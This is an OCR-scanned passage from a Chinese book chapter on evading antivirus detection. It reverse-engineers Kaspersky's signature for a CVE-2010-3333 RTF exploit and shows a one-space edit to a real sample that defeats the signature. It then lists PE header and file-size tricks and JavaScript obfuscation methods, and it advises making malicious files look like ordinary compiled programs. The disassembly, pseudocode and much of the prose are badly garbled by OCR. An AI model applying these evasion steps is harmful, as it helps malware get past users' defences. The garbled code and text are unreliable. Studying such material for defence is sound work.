果 你 用 十 六 进 制 的 编辑 器 〈 这 里 是 Pyew ) 打开 这 个 文件 ， 会 看 到 类 似 下 面 这样 的 结 

0000 41 56 50 20 41 6E 74 69 76 69 72 61 6C 20 44 61 AVP Antiviral Da 

0010 74 61 62 61 73 65 2E 20 28 63 29 4B 61 73 70 65  tabase. (c)Kaspe 

0020 72 73 6B 79 20 4C 61 62 20 31 39 39 37 2D 32 30  rsky Lab 1997-20 

0030 31 34 2E 00 00 00 00 00 00 00 00 00 00 00 OD OA  14........... ss 

0040 4B 61 73 70 65 72 73 6B 79 20 4C 61 62 2E 20 30 Kaspersky Lab. 0 

0050 31 20 41 70 72 20 32 30 31 34 20 20 30 30 3A 35 1 Apr 2014 00:5 

0060 36 3A 34 31 00 00 00 00 00 00 00 00 00 00 00 00  6:41...........- 


0070 000000000000000000000 0000 0D 0A ODOA  ................ 
0080 45 4B 2E 38 03 00 00 00 01 00 00 00 DE CD 00 00 H ER EEEE EEEE TE 


如 你 所 见 ， 这 是 一 个 带 有 ASCI 字 符 串 的 二 进 制 未 知 格式 文件 。 首 先 需要 逆向 分 析 卡 巴 斯 基 
的 内 核 来 确定 特征 文件 的 文件 格式 并 找 出 解析 的 办 法 。 幸 运 的 是 , 已 经 有 人 蔡 你 做 了 。 和 具名 昭著 
的 29A 病 毒 作者 z0mbie 逆 向 分 析 了 旧版 本 的 卡巴 斯 基 内 核 , 找到 了 .AVC 的 文件 构造 方式 ， 并 编写 
了 一 款 解析 软件 。 这 款 工具 的 GUI 版 本 和 源 代 码 可 以 在 该 作者 的 网 站 下 载 : http:/z0mbie. 
daemonlab.org/。 

另外 还 有 一 款 基于 相同 源 代 码 实 现 的 GUI 工具 ， 可 以 在 以 下 论坛 下 载 : www.woodmann. 
com/forum/archive/index.php/t-9913.html。 

这 里 选用 的 GUI 工具 为 AvcUnpackerEXE ， 从 卡巴 斯 基 的 文件 安装 目录 中 复制 一 份 daily.avc 
(或 使 用 Google 搜 索引 苟 ， 从 卡巴 斯 基 的 更 新 服务 器 上 下 载 一 份 )。 使 用 AvcUnpackerEXE 打 开 
daily.avc 文 件 。 选 中 文件 后 ， 点 击 Unpack 按 钮 ， 你 会 看 到 如 图 7-1 所 示 的 窗口 结果 。 
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m .AVC Files Unpacker By cEnginEEr 
Er . ANC file: 
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Unpacking library. 

















[writing Z Ve 
writing Z:*hor lantivirusesNaspersla'Nur 
Unpacking library.. 

| wwritino Z home NR anti Vir ses aspersky\ ur 
ritina Z hon MM RR iue \ kaspersk\ ur H 


wiiting Z hom GM RR RR iie s \ Kaspersky\ ur 
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图 7-1 AVC 工 具 解 析 卡 巴 斯 基 daily.avc 特 征 库 文件 


解压 缩 dailyavc 文 件 后 ， 同 一 目录 下 将 会 出 现 包 括 daily.avc 文 件 在 内 的 多 个 文件 和 文件 目录 
( 如 图 7-2 所 示 )。 





a m M NM M M 


Indenx- Lib-Analyze Lib-Boot & Lib-File Virri Lib-System Lib- 

System MBR Virri Finding Stubs Service Unpacking 

Service Finding Stubs Stubs 

Names Stamm- Stamm-Boot | Stamm:-File Stamm- Author.dat 
Analyze & MBR Virri Virri Packer 


Header.dat 





图 7-2 解压 后 创建 的 文件 和 文件 目录 


大 部 分 解压 得 到 文件 都 十 分 有 意思 。 我们 先 看 第 一 个 名 为 StammFile Virri/Stamms.txt 的 文件 。 
如 果 你 使 用 文本 编辑 器 打开 ， 会 看 到 如 下 内 容 : 








一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 0000 ----------------------------------- 
File Virri-Signature Length (1) = 00 

File Virri-Signature Offset (1) = 0000 

File Virri-Signature (1),w - 0000 

File Virri-Sub Type E 0r 

File Virri-Signature (1),dw - 00000000 

File Virri-Signature Length (2) - 00 

File Virri-Signature Offset (2) - 0000 

File Virri-Signature (2),dw - FFFFFFFF 


File Virri-Virri Finder stub in-0000-» \\Lib-File Virri Finding 
StubsVNOb30000.0bj 
File Virri-Name = 000001C9 -> Trojan.Win32.Hosts2.gen 


File Virri-Cure Parameter - 00 
File Virri-Cure Parameter - 0000 
File Virri-Cure Parameter - 0000 


- 0000 
- 0000 


File Virri-Cure Parameter 
File Virri-Cure Parameter 





(0) 
GE) 
(2) 
File Virri-Cure Parameter (23) - 0000 
(4) 
(5) 
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一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 0001 -------------------------- 
File Virri-Signature Length (1) - 04 

File Virri-Signature Offset (1) - 0000 

File Virri-Signature (1),w - 5C7B 

File Virri-Sub Type - 01 

File Virri-Signature (1),dw = 7B270921 

File Virri-Signature Length (2) - 00 

File Virri-Signature Offset (2) - 0000 

File Virri-Signature (2),dw - 00000000 

File Virri-Virri Finder stub in = 0001 -> \\Lib-File Virri Finding 


StubsXObj0001.0bj 

File Virri-Name - 00000000 -» Exploit.MSWord.CVE-2010-3333.cp 
File Virri-Cure Parameter(0) = 02 
File Virri-Cure Parameter(1) - 0000 
File Virri-Cure Parameter (2) - 0000 
File Virri-Cure Parameter(3) - 0000 
File Virri-Cure Parameter(4) - 0000 
File Virri-Cure Parameter(5) - 0000 
(...many more lines stripped...) 


如 你 所 见 ， 文件 包含 病毒 名 称 ExploitMSWord.CVE-20103333.cp ， 以 及 侦 测 模块 的 路 径 ， 侦 
测 模块 其 实 位 于 通用 对 象 文 件 ( common object file format, COFF) 中 ， 它 包括 了 侦 测 此 类 漏洞 
利用 程序 时 所 要 用 到 的 所 有 代码 。 使 用 IDA Pro 打 开 COFF 对 象 文件 。 初 始 化 以 后 ，IDA 成 功 分 析 
了 COFF 文 件 ， 同 时 显示 了 带 有 调试 符号 的 反 汇 编 结 果 。 本 例 中 有 趣 的 函数 是 _decode。 在 键盘 
上 按 CtrHE 进 入 人口 点 ， 找 到 _gdecode 函 数 的 入 口 点 ， 然 后 按 Enter 键 ， 跳 转 至 反 汇 编 结果 列表 。 
你 会 看 到 如 图 7-3 所 示 的 反 汇编 调试 结果 : 























.text:00000000 ; 

.text:00000000 

.text:00000000 ; 

.text:00000000 

.text:00000000 public | decode 

.text:00000000 | decode proc near 

.text:00000000 

.text:00000000 sea - dword ptr 

|text:00000000 sea = dword ptr 

.text:00000000 

.text:00000000 push ebp 

.text:00000001 mov ebp, ep 

.text:00000003 sub esp, 1 

.text:00000006 cmp dword ptr ds: Header, 'tr\{' 
.text:00000010 jnz loc, F8 

.text:00000016 cmp dword ptr ds: File Length, 5D00h 
.text:00000020 jb loc F8 

.text:00000026 mov 

.text:0000002B mov 

.text:00000031 mov 

.text:00000037 push pr 

.text:00000039 push (offset | Page E*7EO0h) 
.text:0000003E mov [ebp*search buf], eax 
.text:00000041 lea eax, [ebp+search_buf] 

-text :00000044 push 8 

.text:00000046 push eax 

.text:00000047 mov [ebp*search buf44], ecx 
.text:0000004A mov ptr [ebp«search buf48], dl 
.text:0000004D call 3 

.text:00000052 add 

.text:00000055 test 

.text:00000057 jz 

.text:0000005D mov edx, ds:dword_114 
.text:00000063 mov ecx, ds:_0 

.text:00000069 mov eax, dword prr ds: —File_Length 
.text:0000006E mov 

.text:00000071 mov 

.text:00000077 mov 

.text:0000007A movzx 

.text:00000081 mov 


























图 7-3“” 用 于 发 现 CVE-2010-3333 漏 洞 程序 的 通用 侦 测 逻 辑 
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以 上 就 是 要 侦 测 卡巴 斯 基 称 作 ExploitMSWord.CVE-2010-3333.cp 的 漏洞 利用 程序 所 要 用 到 
的 所 有 代码 。 程序 首先 会 检查 文件 头 ( 调试 符号 为 ds:_Header external) 是 否 是 以 
0x74725C7B 开 始 ( 十 六 进 制 字 符 为 'tr\{' )， 然 后 校 验 文件 长 度 ( 调试 符号 为 das:_File_ 
Length ) 是 否 大 于 0x5D00 字 节 ( 23 808 字 节 ) 初期 检查 结束 后 , 程序 会 参考 查找 ASCII 字 符 ilpa 
和 ocen， 然 后 调用 名 为 DCBMS2 的 函数 ， 结 果 如 下 : 


























.text:00000026 mov eax, ds:s_ilpd 

.text:0000002B mov ecx, ds:s ocen 

.text:00000031 mov dl, ds:byte 128 

.text:00000037 push 20h oto 

.text:00000039 push (offset | Page E-«7EO0h) 

.text:0000003E mov [ebp«search buf], eax 

.text:00000041 lea eax, [ebp-«search buf] 

.text:00000044 push 8 

.text:00000046 push eax 

.text:00000047 mov [ebp+search buf«4], ecx 

.text:0000004A mov byte ptr [ebp-«search buf+8], dl 

.text:0000004D call . DGBMS2 

.text:00000052 add esp, 10h 

如 果 你 不 清楚 DGBMS2 函 数 的 功能 ， 可 以 暂且 认为 它 是 用 来 查找 文件 中 字符 串 的 函数 。 事 实 
上 ，DGBMS2 隙 数 会 查找 在 Page_FE 符 号 后 面 某 处 的 字符 串 dp1li 和 neco ( 每 个 Page_x 符 号 都 包含 























文件 中 的 相关 字 节 。 比 如 ，Page_A 对 应 的 是 第 一 个 千 字 节 ，Page_B 对 应 的 是 第 二 个 千 字 节 ， 以 
此 类 推 ), 按照 这 样 的 步骤 查找 完 后 , 如 果 匹 配 到 了 对 应 的 字符 串 ， 函数 会 查找 文件 末尾 的 23 808 

















字 节 ， 读 取 Page_c 里 的 $12 字 节 ， 然 后 查找 字符 串 人 \\sp2{\\sn1 pFfllments): 
.text:0000005D mov edx, dword ptr ds:  0«4 ; "2{\\snl pF" 
.text:00000063 mov ecx, dword ptr ds: . ; "(NNsp2(NNsnl pF" 
.text:00000069 mov eax, dword ptr ds: File Length 
.text:0000006E mov [ebp«search buf2], ecx 
.text:00000071 mov ecx, dword ptr ds:  0«8 ; "nl pF" 
.text:00000077 mov [ebp«search buf2+4], edx 
.text:0000007A movzx edx, word ptr ds:  0«0Ch ; "F" 
.text:00000081 mov [ebp«search buf2+8], ecx 
.text:00000084 mov ecx, dword ptr | ; "ments)" 
.text:0000008A mov word ptr [ebp-«search buf2-«0Ch], dx 
.text:0000008bE movzx edx, word ptr _+4 ; "s}" 
.text:00000095 push 200h ;  .DWORD 
.text:0000009A add eax, OFFFFA300h 
.text:0000009F mov [ebp«search buf], ecx 
.text:000000A2 mov cl, byte ptr 46 ; "" 

.text:000000A8 push offset Page C ; | DWORD 
.text:000000AD push eax ; _DWORD 
.text:000000AE mov word ptr [ebp-«search buf-«4], dx 
.text:000000B2 mov byte ptr [ebp-«search buf-«6], cl 
.text:000000B5 call . Seek Read 

.text:000000BA add esp, OCh 

.text:000000BD cmp eax, 200h 

.text:000000C2 jnz short loc F8 

.text:000000C4 push eax ; _DWORD 
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:000000C5 
:000000CA 
:000000CD 
:000000CF 
:000000D0 
:000000D5 
:000000D8 
:000000DA 
:000000DC 
:000000E1 
:000000E6 
:000000E9 
:000000EB 
:000000EC 
:000000F1 


.Cex 
.Cex 








Ct 
[Ul 
* 
作 Cf cf cf ctf ct ct ct cv cv cv ctf ctf ct cd 


.Cex 


jz 
push 
push 
lea 
push 
push 
call 
add 





T2 
offset Page C ; |DWORD 
edx, [ebp-«search buf2] 
ODh ; .DWORD 
edx ; .DWORD 
. DGBMS2 
esp, 10h 
eax, eax 
short loc F8 
200h ; .DWORD 
offset Page C ; |DWORD 


eax, [ebp-«search buf] 

6 ; .DWORD 
eax ; -DWORD 
. DGBMS2 

esp, 10h 


如 果 一 切 顺 利 的 话 ， 函 数 会 返回 1， 表 示 文 件 处 在 被 感 娄 状态。 如果 缺 失 上 述 特 征 中 的 一 个 ， 
函数 就 会 返回 0， 表 示 文 件 正 常 ， 没 有 被 感染 。 可 以 通过 Hex-Rays 公 司 的 反 汇 编 软 件 IDA 查 看 到 
特征 码 的 完整 伪 代 码 ， 如 图 7-4 所 示 。 




















1 
int result; // 
nt r f 1]; // F 
Ed ; // [sf 
r lt = 0; 
if ( Header == 'tr\\{' && File Length >= 0x5D00u ) 
[0] = s ilpd 
à buf[1] = s_ocen 
LOBYTE( t[2]) = 0; 
if ( DGBMS2( 上 E 4 *)&Page E + 2016 32) ) 
1 
earch. [0] = *(.Di ) p pF"; 
[1] = *(_I ) "2 sni pF 
earch I [2] = *(.DW ) pF 
LOWORD(sear [313 = *{ ) 
ear = [0] = C. ) "ment 
LOWORD (s: E [1]) = 【 ) 
BYTE2( [1]) = [6] 
if ( ad(File Length - &Page C, 512) == 512 
&& rct 1£2, 13, &E C, 512) 
&& + 6, &Pag 512) ) 
1 
= 1; 
} 
} 
return 
$ 
图 7-4 | aecoaePK CI DT R 


分 析 完 OBJ 文 件 里 的 侦 测 逻 辑 以 后 ， 很 显然 可 以 找到 多 种 绕 过 反 病 毒 侦 测 方法 。 比 如 ， 如 果 
可 以 更 改 文件 头 或 让 漏洞 利用 文件 小 于 0x5D00 字 节 ， 相 关 检 测 代码 就 无 法 检测 文件 中 所 有 的 代 
人 码 逻 辑 了 。 如 果 你 在 扫描 器 执行 完 初 步 侦 测 分 析 后 ， 更改 扫描 程序 试图 匹配 的 字符 串 ， 同样 可 以 
绕 过 反 病 毒 软件 的 检测 。 这 是 因为 经 过 修改 后 , 扫描 器 依赖 的 样本 特征 与 新 的 样本 文件 不 符 ， 所 
以 通用 侦 测 无 法 再 检测 该 样本 。 现 在 ， 我 们 已 经 知道 该 怎么 做 了 。 通 过 在 控制 字符 \sp2 和 \sn1 
之 间 加 一 个 空格 ， 对 文件 进行 细小 的 修改 。 为 了 进行 演示 ， 我 们 选用 SHA1 散 列 值 为 aeac10- 
f9799061780b186160c0be863alae00579 的 样本 文件 。 可 以 登录 以 下 网 址 查看 VirusTotal 的 扫 
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描 报 告 : https:/www.virustotal.com/file/651281158d96874277497f769e62827c48ae495c622141e183- 
fc7£7895d95e3f/analysis/ ; 

报告 显示 , 在 57 款 反 病 毒 引 擎 中 , 有 24 款 反 病 毒 软件 检测 出 了 样本 , 卡巴 斯 基 就 是 其 中 之 一 。 
我 们 如 果 在 文件 中 搜索 卡巴 斯 基 匹配 的 特征 字符 串 {\\sp2{\\snl pF 和 ments}, 会 在 偏 移 量 
0x11b6 处 看 到 如 下 结 


$ pyew 6512811584d96874277497£769e62827c48ae495c622141e183fc7£7895d95e3f 
0000 7B 5C 72 74 78 61 7B 5C 61 6E 73 69 7B 5C 73 68 {.rtxa{.ansi{.sh 
0010 70 7B 5C 2A 5C 73 68 70 69 6E 73 74 5C 73 68 70 p{.*.shpinst.shp 
(...many lines stripped...) 

[0x00000000]» /s \sp2 

HINT[0x000011b6]: .sp2{.snl pF)í.sn2 rag)í.*.comment)í(.sn3 ments) 

{BV 3;:8;15 


你 可 以 使 用 文本 编辑 器 打开 这 个 RTF 文 件 (RTF 文 件 其 实 就 是 纯 文 本 文件 )， 然 后 在 字符 串 
\sp2 和 {\sn1l 之 间 加 一 个 空格 。 做 完 这 样 的 变更 后 , 我 们 发 现 样本 仍然 可 以 和 运行, 但 是 检测 出 修 
改 后 样本 的 反 病 毒 引 擎 数 有 了 明显 的 下 降 , VirusTotal 多 引擎 扫描 报告 如 下 : https://www.virustotal. 
com/file/f2b9ed2833963abd1f002261478f03c719e4f73101801834bd602652b8612 1e5/analysis/1422286- 
268/, 

扫描 结果 从 24/57 下 降 到 了 18/56。 不 出 我 们 所 料 ， 我 们 研究 的 对 象 卡巴 斯 基 也 没有 检测 出 修 
改 后 的 样本 。 

可 喜 可 贺 ， 我们 已 经 以 一 种 优雅 的 方式 绕 过 了 卡巴 斯 基 的 通用 病毒 扫描 。 


7.3” 绕 过 特定 文件 格式 的 相关 提示 和 技巧 


可 以 用 于 传播 恶意 软件 的 文件 格式 以 及 恶意 软件 使 用 的 小 伎俩 数量 惊人 。 接 下 来 的 几 节 将 只 
涉及 其 中 一 些 最 常见 的 文件 格式 和 技巧 , 并 重点 介绍 如 何 使 PE、JavaScript 和 PDF 文件 绕 过 反 病 毒 
软件 的 检测 。 













































































7.3.1 PE 文件 


Windows 可 执行 文件 也 被 称 作 PE ( portable executable ) 文件 。 因 为 可 以 不 依赖 于 其 他 程序 ( 比 
如 说 Microsoft Word ) 独立 运行 ， 可 执行 文件 格式 自然 而 然 地 成 为 了 恶意 软件 编写 者 最 亲 睐 的 文 
件 格式 。 由 于 太 容 易 被 反 病 毒 软件 侦 测 到 , 可 执行 文件 一 般 不 会 作为 恶意 软件 开展 一 线 攻击 的 文 
件 格 式 。 恶 意 软件 通常 以 PDF 或 Microsoft Office 文 件 的 形式 传播 ， 同 时 还 会 借助 浏览 器 漏洞 的 利 
用 程序 。 但 是 ， 利 用 浏览 器 漏洞 的 最 后 一 步 ， 一 般 是 从 一 些 节点 上 下 载 一 个 或 多 个 PE 文件 。 

有 无 数 的 办 法 可 以 用 来 修改 PE 文件 而 不 变更 其 行为 或 对 其 进行 很 大 的 改动 ,一 些 最 典型 的 修 
改 方法 ( 同时 也 很 复杂 ) 列举 在 了 Corkami 项 目的 wiki 页 面 上 ， 这 个 页 面 讨论 的 内 容 主 要 与 PE 文 
件 有 关 : https://code.google.com/p/corkami/wiki/PE o 

Corkami 项 目 是 一 位 名 叫 Ange Albertini 的 安全 研究 者 编译 并 向 公众 开放 的 一 个 代码 仓库 ， 其 
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中 包括 不 少 新 颖 的 思路 。Ange Albertini 对 文件 格式 相关 的 技术 研究 十 分 感 兴趣 ， 而 且 人 研究 颇 深 。 

我 们 选取 了 其 中 最 基础 和 最 有 用 的 相关 技巧 ， 列 举 如 下 。 

OQ 区 段 名 称 ”对 于 一 些 特殊 的 文件 壳 或 者 压缩 器 来 说 ， 区 段 的 名 称 没有 实际 意义 。 只 要 保 
持 区 块 大 小 (最 多 为 8 个 字符 ) 恒定 ， 你 就 可 以 随意 变更 区 段 的 名 称 。 一 些 反 病毒 软件 的 
通用 扫描 器 会 匹配 文件 的 区 段 来 判断 文件 是 否 是 某 一 类 恶意 软件 的 变种 。 

口 时 间 惟 ”在 某 些 情况 下 ， 某 一 类 恶意 软件 的 变种 会 带 有 相同 的 时 间 戳 ( 编译 文件 的 时 
间 )， 有 一 些 反 病毒 软件 的 扫描 程序 会 以 时 间 戳 作为 查 杀 亚 意 软 件 的 依据 之 一 。 有 时 ， 
时 间 戳 区 域 会 作为 独立 的 一 条 扫描 特征 。 自 然 ， 时 间 戳 对 于 操作 系统 来 说 没有 什么 实 
际 意 义 ， 可 以 随意 修改 ， 时 间 戳 的 值 甚至 可 以 为 NULIL。 

口 链接 器 的 主 副 版 本 号 ”通常 ， 和 时 间 戳 一 样 ， 链 接 器 的 主 副 版 本 号 对 操作 系统 来 说 也 没 

有 什么 关联 。 修 改 链接 器 的 主 副 版 本 号 不 会 让 PE 文件 无 法 正常 执行 。 

口 操作 系统 的 主 副 版 本 号 以 及 镜像 文件 的 主 副 版 本 号 ”和 时 间 戳 以 及 链接 器 的 主 副 版 本 号 类 

似 , 操作 系统 的 主 副 版 本 号 以 及 镜像 文件 的 主 副 版 本 号 的 改变 , 也 不 会 影响 PE 文件 的 执行 。 

口 AddressOfEntryPoint 值 一 般 认 为 AddressofEntryPoint 不 能 为 NULL， 但 事实 上 
它 可 以 为 NULL， 表 示 程 序 的 入 口 点 在 偏 移 量 0x00 处 ; 准确 来 讲 ， 是 在 以 魔术 字 节 Mz 起 始 
的 IMAGE_DOS_HEADER 处 。 

O 区 段 数量 的 最 大 值 ”在 Windows XP 操作 平台 上 ，PE 文 件 的 区 段 数量 最 大 值 为 96。 在 
Windows 7 平台 上 ， 区 段 最 大 数量 可 以 为 65 535。 出 于 性 能 的 原因 ， 一 些 反 病毒 软件 在 进 
行 通 用 病毒 扫描 前 ， 会 首先 检查 PE 文件 是 否 已 经 损坏 ， 其 中 一 项 检查 依据 就 是 ， 预 期 区 
段 数量 值 不 能 大 于 96。 除 了 Windows XP ( 目前 该 操作 系统 已 放弃 更 新 支持 ) 以 外 ， 此 检 

查 依据 对 目前 任何 一 款 操作 系统 来 说 都 是 错误 的 。 

OQ 文件 长 度 尽管 对 于 PE 文件 来 说 没有 特别 的 规定 ， 但 当 它 们 的 大 小 超过 某 个 值 的 时 候 ， 
通用 病毒 侦 测 引擎 就 会 跳 过 扫描 该 文件 。 因 此 ， 在 不 妨碍 PE 文件 正常 执行 的 情况 下 ， 可 
以 在 文件 未 尾 添加 尽 可 能 多 的 数据 ， 来 实现 绕 过 反 病 毒 软件 扫描 引擎 的 目的 。 这 样 的 情 
况 并 不 少见 。 比 如 ， 因 为 大 多 数 恶意 软 件 文件 都 比较 小 ， 所 以 对 很 多 启发 式 引 警 来 说 ， 
通过 跳 过 扫描 一 些 超大 的 文件 ， 可 以 在 一 定 程度 上 减少 性 能 消耗 。 

还 有 其 他 很 多 可 以 绕 过 针对 PE 文件 的 侦 测 技巧 , 强烈 推荐 Ange Albertini 的 wiki 页 面 来 了 解 一 

下 有 关 PE 文 件 格式 的 相关 信息 。 
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提示 “尽管 Albertini 的 项 目 页 面 中 列举 的 一 些 技巧 对 于 绕 过 反 病 毒 软件 的 扫描 很 有 效 , 但 需要 提 
醒 的 是 ， 这 些 技巧 并 不 常见 。 这 就 意味 着 ， 如 果 文 件 样本 使 用 了 这 些 技巧 ， 很 有 可 能 会 
被 识别 为 可 疑 文件 。 为 了 使 编写 的 恶意 文件 绕 过 反 病 毒 软件 的 侦 测 ， 建 议 你 尽 可 能 让 编 
写 的 样本 文件 表现 得 和 正常 文件 一 样 。 比 如 ， 使 程序 看 起 来 就 像 一 个 由 Microsoft Visual 
C++ 编译 的 原生 程序 一 样 ， 没 有 经 过 混淆 、 加 壳 等 处 理 。 经 过 这 样 的 处 理 ， 可 以 降低 恶 
意 软 件 的 可 疑 程度 ， 使 其 对 病毒 研究 人 员 来 说 不 那么 显眼 。 
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7.3.2 JavaScript 


许多 通过 互联 网 传播 的 针对 浏览 器 漏洞 的 利用 程序 , 都 是 使 用 JavaScript 语 言 编写 的 。 许 多 恶 
意 软件 借助 浏览 器 ( 如 Internet Explorer 或 Firefox ) 的 漏洞 ， 通 过 在 页 面 内 注入 iframe 窗 口 或 诱导 
用 户 访问 带 有 漏洞 攻击 利用 程序 的 站 点 ， 并 最 终 下 载 可 执行 文件 (如 PE 文件 )， 来 实现 对 受害 者 
电脑 的 感染 。 因 此 ， 许 多 反 病 毒 工程 师 会 花费 大 量 时 间 研 究 如 何 侦 测 恶意 JavaScript 代 码 。 但 是 ， 
JavaScript 本 身 是 一 门 非常 灵活 开放 的 动态 执行 的 编程 语言 ,允许 代码 进行 许多 不 常见 但 仍 可 执行 
的 变化 操作 。 在 这 种 情况 下 , 我 们 无 法 直接 阅读 构造 器 和 JavaScript 代 码 来 解读 其 操作 行为 , 但 对 
JavaScript 的 解释 器 来 说 ， 这 完全 是 小 沫 一 碟 。 

比如 ， 你 可 以 辨识 出 以 下 代码 做 了 哪些 操作 吗 ? 

alert (Number(51966).toString(16)); 

代码 将 十 进 制 数字 51 966 转 化 成 对 应 的 十 六 进 制 形式 0xcafe， 并 通过 tostring (16) 返 回 一 
个 字符 串 ， 最 终 弹 出 了 内 容 为 “cafe” 的 消息 窗口 。 这 个 比较 简单 ， 不 是 吗 ? 那 如 果 是 下 面 这 样 
一 段 JavaScript 代 码 呢 ? 

























































































window[Number (14) .toString(16) + 
Number (31) .toString(36) + 
Number(10).toString(16) + 

( 


Number (Math.sqrt(441)).toString (35) 
] (unescape("alert$282$22Hi222229")); 


上 面 这 段 代码 运行 后 会 弹出 消息 提示 框 ， 内 容 为 “Hi”。 虽 然 看 起 来 已 经 比较 复杂 了 ， 但 还 
有 更 复杂 的 ， 如 图 7-5 所 示 。 


var _0x1272=[ 














];eval(function ( Ox9fd7x1, Ox9fd7x2, - 0x9fd7x3, .Ox9fd7x4, Ox9fd7x5, Ox9fd7x6)( Ox9fd7x5- function É 
_0x9fd7x3){return ( Ox9fd7x3«  'Ox9fd7x 2?  0x127214]: 0x 9fd7x xS(parselInt( Ox9fd7x3/ 0x9fd7x2)))*(( Ox9fd7x3- Ox9fd7x3* 0x9fd7x2)»35?String[ 0x1272[5]]( 0x9fd7x3*29): 
—0x9fd7x3.toString(36)):;) ;if(! 0x1272[4][ 0x1272[6]] (/^/, String)) (While( Ox9fd7x3--)( Ox9fd7x6[ Ox9fd7x5( 0x9fd7x3)]- Ox9fd7x4[ Ox9fd7x3]| | Ox9fd7x5(. Ox9fd7x3):) ; 
.Ox9fd7x4-[function ( Ox9fd7x5)(return  Ox9fd7x6[ Ox9fd7x5]:) ]: Ox9fd7x5-function ()(return  0x1272[7]:) : Ox9fd7x3-1;:) ;while( Ox9fd7x3--)(if( Ox9fd7x4[ | Ox9fd7x3 
])( 0x9fd7x1- Ox9fd7x1[ 0x1272[6]]( new RegExp (. 0x1272[8]-*. Ox9fd7x5(. Ox9fd7x3)*. 0x1272[8].,. 0x1272[9]),. Ox9fd7x4[ 0x9fd7x3]):) :) ;return _0x9fd7x1;} (.0x1272[0],62 
73, 0x1272[3 0x1272[2 0x1272[1]),0.(1)) 











K7-5 ”被 混 消 的 JavaScript 代 码 
上 述 代码 运行 后 也 仅仅 是 弹出 一 个 内 容 为 “Hi” 的 消息 提示 框 。 如 你 所 见 ， 只 要 你 敢 想 ， 就 
会 发 现 有 许多 技巧 可 以 用 来 混淆 JavaScript 代 码 或 逻辑 , 并 绕 过 反 病 毒 软件 的 侦 测 。 下面 将 为 大 家 
介绍 一 些 有 趣 的 JavaScript 代 人 码 混淆 技巧 。 
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1. 字符 串 编 码 
有 多 种 方式 可 以 对 字符 串 进行 编码 。 比 如 ,通过 一 系列 拼接 操作 ,达到 对 真实 字符 串 实 现 部 
分 隐藏 的 效果 : 


var dq = "e"; vár x = Wr Var n= "a"; var zz = "1"} 
real string - a + x « n + zz 0; 
再 举 一 个 和 上 一 节 相似 的 例子 : 将 字符 串 编 码 为 数字 ,然后 在 执行 过 程 中 还 原 成 字符 串 。 此 











处 使 用 的 技巧 是 ， 使 用 JavaScript 中 的 escape 和 unescape 函 数 ， 

unescape ("alert$28$22Hi$22$29"); 

通过 上 面 这 段 代 码 ， 混 消 了 完整 的 字符 串 alert ('Hi')， 使 其 变 得 不 那么 容易 辨识 了 。 在 
进行 字符 串 混 消 操 作 的 过 程 中 , 最 好 借助 一 些 反 混淆 工具 , 因为 混淆 过 后 的 代码 会 变 得 无 法 理解 。 

2. 动态 直译 

许多 解释 器 允许 代码 编写 完成 后 , 不 经 过 编译 直接 动态 直译 执行 。 比 如 在 JavaScript 中 , 可 以 
通过 向 eval 函 数 传递 字符 串 形 式 的 参数 ， 进 而 执行 相关 人 代码。 但是， 还 有 其 他 一 些 函 数 ， 比 如 
setTimeout (用 于 在 一 段 时 间 后 执行 相应 代码 的 函数 )、adgdEventListener 或 document. 
write 可 以 向 页 面 内 写 人 HITML 和 JavaScript 代 码 。 因 此 在 JavaScript 中 , 你 可 以 将 多 种 技巧 混合 使 
用 。 比 如 ， 通 过 setTimeout 设 置 一 段 时 间 后 ， 执 行 某 一 字符 串 从 而 借助 aocument .write 问 页 
面 内 写 和 人 混 消 程度 更 高 的 HTIML 和 JavaScript 代 码 ， 最 终 通过 eval 函 数 执行 真实 的 代码 。 在 实战 
中 ， 你 可 以 根据 需要 ， 将 这 些 技巧 串联 使 用 。 

3. 隐藏 代码 逻辑 : 代码 混淆 和 垃圾 代码 

另 一 项 常用 的 绕 过 技巧 ,是 使 用 垃圾 代码 隐藏 代码 真实 逻辑 并 混淆 代码 。 值 得 一 提 的 是 ,这 
项 技巧 并 不 仅 限 于 JavaScript 语 言 。 使 用 代码 混淆 技巧 后 , 除非 反 病 毒 引 擎 带 有 高 级 复杂 的 静态 分 
析 功 能 ， 和 否则 恶意 软件 样本 很 难 被 扫描 器 侦 测 到 。 


var al = 10; // 在 程序 中 提前 设置 定义 对 象 










































































Jc esos 

// 一 些 花 指 令 

Ll. es 

if (a1 ss 10 ) 


{ 

// 实际 代码 
} 
else 


{ 

// 花 指 令 

} 

除 此 以 外 , 还 可 以 结合 其 他 许多 技巧 来 隐藏 代码 的 真实 逻辑 。 比 如 ,使 用 无 意义 的 变量 和 函 
数 名 ， 或 使 用 与 真实 行为 不 符 的 变量 或 函数 名 称 ， 并 动态 执行 构造 的 代码 。 比 如 ，tostring 方 
法 可 以 被 重 写 履 盖 ， 并 通过 其 父 对 象 间接 调用 执行 。 这 时 候 ， 重 写 过 后 的 toString 方 法 不 是 返 
回 字 符 串 的 值 ， 而 是 调用 sval 执 行 JavaScript 代 码 。 在 JavaScript 中 ， 我 们 可 以 将 多 种 混淆 绕 过 技 
巧 结合 起 来 ,使 得 常人 在 不 借助 工具 的 情况 下 无 法 了 解 代 码 的 真实 行为 。 使 用 了 混淆 技巧 后 , 一 
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些 仅仅 基于 常见 基础 字符 串 匹配 的 特征 码 扫 描 程序 就 无 法 检测 这 类 恶意 软件 样本 了 。 反 病毒 厂商 
也 意识 到 了 恶意 软件 使 用 绕 过 技巧 的 这 一 趋势 ， 并 开始 在 反 病 毒 产品 中 整合 进 解 释 器 /模拟 器 ， 
但 这 类 解决 方案 仍然 会 遗漏 一 些 新 型 的 混淆 技巧 。 











7.3.3 PDF 


PDF 文档 的 全 称 为 便携 文档 格式 (portable document format )， 这 种 文件 格式 与 软件 和 操作 系 
统 无 关 ， 会 忠实 地 再 现 原稿 的 每 一 个 字符 、 颜 色 以 及 图 像 。1991 年 ，Adobe 公 司 研 发 了 PDF 文 件 
格式 (起初 被 称 作 Camelot )， 如 今 PDF 文 件 被 广泛 用 于 主流 的 操作 系统 平台 。 和 其 他 被 广泛 使 用 
的 旧 文 件 格式 类 似 ，PDF 格 式 十 分 复杂 ， 其 规范 元 长 且 错误 百出 ; 同时 ，PDF 文 件 还 饱 受 文档 中 
没有 介绍 清楚 的 一 些 细节 问题 和 异常 的 困扰 。 

